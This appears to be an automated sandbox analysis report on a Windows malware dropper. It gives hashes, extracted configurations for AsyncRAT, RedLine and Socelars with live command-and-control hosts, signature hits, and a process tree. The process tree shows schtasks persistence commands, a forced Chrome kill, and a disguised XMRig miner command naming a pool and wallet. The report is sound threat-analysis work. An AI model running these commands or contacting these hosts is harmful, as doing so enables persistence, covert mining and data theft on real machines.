Analysis
-
max time kernel
0s -
max time network
143s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
28-12-2023 09:54
Static task
static1
General
-
Target
d7348622e8bddc8aeab8662e78d804b6.exe
-
Size
3.1MB
-
MD5
d7348622e8bddc8aeab8662e78d804b6
-
SHA1
7b61698bb07ec312bd92705fdd799c6ce6d3e2c1
-
SHA256
12ce860b2726217e1ad462071f073e05b85dce749caaf4a2daa390b56a052208
-
SHA512
dfac761454073b82e7bc7315e8af2f90fe757e139a55d7508fb2c279e7a7b65134b7d66a405c0a2d25d8e9780b031b1624f294bc9455ad9128523da273bdeaa4
-
SSDEEP
49152:/b5G/cTJBQRowY6Zg0fLzc9SWZnJqJDCDTnxJ2xKy+qDDq3a:Un4yg0jyS8JECDjixmqDG
Malware Config
Extracted
asyncrat
0.5.7B
Default
whiteshadows.ddns.net:9731
AsyncMutex_6SI8OkPnk
-
delay
3
-
install
true
-
install_file
microsoft 2.exe
-
install_folder
%AppData%
Extracted
gcleaner
g-prtnrs.top
g-prtrs.top
Extracted
redline
UPD
185.215.113.45:41009
Extracted
socelars
http://www.iyiqian.com/
http://www.xxhufdc.top/
http://www.uefhkice.xyz/
http://www.wygexde.xyz/
Extracted
redline
Liez
liezaphare.xyz:80
Signatures
-
OnlyLogger
A tiny loader that uses IPLogger to get its payload.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 7 IoCs
resource yara_rule behavioral1/memory/1336-105-0x0000000002580000-0x000000000259E000-memory.dmp family_redline behavioral1/memory/1336-100-0x0000000000520000-0x0000000000540000-memory.dmp family_redline behavioral1/memory/1872-301-0x0000000000400000-0x000000000041E000-memory.dmp family_redline behavioral1/memory/1872-298-0x0000000000400000-0x000000000041E000-memory.dmp family_redline behavioral1/memory/1872-295-0x0000000000400000-0x000000000041E000-memory.dmp family_redline behavioral1/memory/1872-292-0x0000000000400000-0x000000000041E000-memory.dmp family_redline behavioral1/memory/1872-291-0x0000000000400000-0x000000000041E000-memory.dmp family_redline -
SectopRAT payload 7 IoCs
resource yara_rule behavioral1/memory/1336-105-0x0000000002580000-0x000000000259E000-memory.dmp family_sectoprat behavioral1/memory/1336-100-0x0000000000520000-0x0000000000540000-memory.dmp family_sectoprat behavioral1/memory/1872-301-0x0000000000400000-0x000000000041E000-memory.dmp family_sectoprat behavioral1/memory/1872-298-0x0000000000400000-0x000000000041E000-memory.dmp family_sectoprat behavioral1/memory/1872-295-0x0000000000400000-0x000000000041E000-memory.dmp family_sectoprat behavioral1/memory/1872-292-0x0000000000400000-0x000000000041E000-memory.dmp family_sectoprat behavioral1/memory/1872-291-0x0000000000400000-0x000000000041E000-memory.dmp family_sectoprat -
Socelars payload 1 IoCs
resource yara_rule behavioral1/files/0x00080000000122c9-16.dat family_socelars -
Async RAT payload 2 IoCs
resource yara_rule behavioral1/memory/2904-61-0x0000000001030000-0x0000000001042000-memory.dmp asyncrat behavioral1/memory/1672-261-0x0000000000A10000-0x0000000000A22000-memory.dmp asyncrat -
OnlyLogger payload 4 IoCs
resource yara_rule behavioral1/memory/2220-102-0x0000000000340000-0x000000000036E000-memory.dmp family_onlylogger behavioral1/memory/2220-104-0x0000000000400000-0x0000000000477000-memory.dmp family_onlylogger behavioral1/memory/2220-286-0x0000000000400000-0x0000000000477000-memory.dmp family_onlylogger behavioral1/memory/2220-305-0x0000000000340000-0x000000000036E000-memory.dmp family_onlylogger -
XMRig Miner payload 8 IoCs
resource yara_rule behavioral1/memory/2052-392-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/2052-394-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/2052-395-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/2052-397-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/2052-396-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/2052-393-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/2052-391-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/2052-390-0x0000000140000000-0x0000000140786000-memory.dmp xmrig -
Executes dropped EXE 1 IoCs
pid Process 2476 3002.exe -
Loads dropped DLL 3 IoCs
pid Process 1252 d7348622e8bddc8aeab8662e78d804b6.exe 1252 d7348622e8bddc8aeab8662e78d804b6.exe 1252 d7348622e8bddc8aeab8662e78d804b6.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2520 schtasks.exe 2184 schtasks.exe 2884 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 2068 timeout.exe -
Kills process with taskkill 1 IoCs
pid Process 2108 taskkill.exe -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 1252 wrote to memory of 2476 1252 d7348622e8bddc8aeab8662e78d804b6.exe 44 PID 1252 wrote to memory of 2476 1252 d7348622e8bddc8aeab8662e78d804b6.exe 44 PID 1252 wrote to memory of 2476 1252 d7348622e8bddc8aeab8662e78d804b6.exe 44 PID 1252 wrote to memory of 2476 1252 d7348622e8bddc8aeab8662e78d804b6.exe 44
Processes
-
C:\Users\Admin\AppData\Local\Temp\d7348622e8bddc8aeab8662e78d804b6.exe"C:\Users\Admin\AppData\Local\Temp\d7348622e8bddc8aeab8662e78d804b6.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1252 -
C:\Users\Admin\AppData\Local\Temp\askinstall54.exe"C:\Users\Admin\AppData\Local\Temp\askinstall54.exe"2⤵PID:2152
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe3⤵PID:1052
-
-
-
C:\Users\Admin\AppData\Local\Temp\microsoft 2.exe"C:\Users\Admin\AppData\Local\Temp\microsoft 2.exe"2⤵PID:2904
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp1DFC.tmp.bat""3⤵PID:2156
-
C:\Users\Admin\AppData\Roaming\microsoft 2.exe"C:\Users\Admin\AppData\Roaming\microsoft 2.exe"4⤵PID:1672
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "microsoft 2" /tr '"C:\Users\Admin\AppData\Roaming\microsoft 2.exe"' & exit3⤵PID:2408
-
-
-
C:\Users\Admin\AppData\Local\Temp\updatenew.exe"C:\Users\Admin\AppData\Local\Temp\updatenew.exe"2⤵PID:1336
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"2⤵PID:2220
-
-
C:\Users\Admin\AppData\Local\Temp\NGlorySetp.exe"C:\Users\Admin\AppData\Local\Temp\NGlorySetp.exe"2⤵PID:1652
-
-
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"2⤵PID:1864
-
-
C:\Users\Admin\AppData\Local\Temp\GLKbrow.exe"C:\Users\Admin\AppData\Local\Temp\GLKbrow.exe"2⤵PID:2720
-
C:\Users\Admin\AppData\Local\Temp\GLKbrow.exeC:\Users\Admin\AppData\Local\Temp\GLKbrow.exe3⤵PID:1488
-
-
C:\Users\Admin\AppData\Local\Temp\GLKbrow.exeC:\Users\Admin\AppData\Local\Temp\GLKbrow.exe3⤵PID:2588
-
-
C:\Users\Admin\AppData\Local\Temp\GLKbrow.exeC:\Users\Admin\AppData\Local\Temp\GLKbrow.exe3⤵PID:1872
-
-
-
C:\Users\Admin\AppData\Local\Temp\Chrome3 2.exe"C:\Users\Admin\AppData\Local\Temp\Chrome3 2.exe"2⤵PID:2644
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit3⤵PID:1780
-
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"3⤵PID:2500
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit4⤵PID:2408
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'5⤵
- Creates scheduled task(s)
PID:2884
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"4⤵PID:2828
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=47z3fqW3wLPWJ4ACFetLRFTPAKWWqwp7fhF7gdaVDWfHYCiURua8iAr4mxbDH3aYV2AaqSTigrpDnKV9EM5Jjgs4TK1FnQq.living/password --pass= --cpu-max-threads-hint=60 --cinit-remote-config="IlgMz0+JU7iopFBOXa1Od8xMK7xTy6luvhw0lKe0bpM=" --cinit-idle-wait=5 --cinit-idle-cpu=80 --tls --cinit-stealth4⤵PID:2052
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\BearVpn 2.exe"C:\Users\Admin\AppData\Local\Temp\BearVpn 2.exe"2⤵PID:2864
-
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe"2⤵
- Executes dropped EXE
PID:2476
-
-
C:\Users\Admin\AppData\Local\Temp\GLKbrow.exeC:\Users\Admin\AppData\Local\Temp\GLKbrow.exe1⤵PID:1940
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe" -a1⤵PID:2760
-
C:\Windows\SysWOW64\timeout.exetimeout 31⤵
- Delays execution with timeout.exe
PID:2068
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "microsoft 2" /tr '"C:\Users\Admin\AppData\Roaming\microsoft 2.exe"'1⤵
- Creates scheduled task(s)
PID:2520
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'1⤵
- Creates scheduled task(s)
PID:2184
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe1⤵
- Kills process with taskkill
PID:2108
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
6KB
MD5e1fabd305a669e8bf9e695fa85bf1b73
SHA194540734ec0c0c5a54e9c335a771869cd7dfe8d8
SHA256b04cb157772e761841ffbdd731762cf6271501ef982ca9ed3fe19f899fd3178c
SHA5123db5f7a5b54124b1159bc8d10bcdc20437918f86f7a7bb2dc3c35b70a15a16d10cc9615ad00c443aa5ba7d6bef33f3fdb8ed101cf697ef0be1ffb6c495b07340
-
Filesize
1.4MB
MD5f15409c47e5eb9ef4b316c3c8d2d3936
SHA132df482df77e5ef84560ff814a725831acb89b42
SHA256ec860b4ca9a08990622bc7fd0606383c965de9dd58bcf2022de601988fb7e3a4
SHA5122e8ba5d6b6d599f4df23365f0f93eee65f51ad369794b0d43d4e56a9060700a038e7af9dc15bca3034c20cfadc2300dff526ec64fb08c9499cb2fa24943949fc
-
Filesize
56KB
MD5e511bb4cf31a2307b6f3445a869bcf31
SHA176f5c6e8df733ac13d205d426831ed7672a05349
SHA25656002017746f61eee8d8e9b5ad2f3cbb119dc99300c5b6d32c1be184d3e25137
SHA5129c81de34bf3b0eb75405c726d641ef6090054e9be8e0c0ab1bb2ed095e6477ce2fa8996868bf8a77a720b210a76b5f4e1b3b086d7f40449d79498681b367199c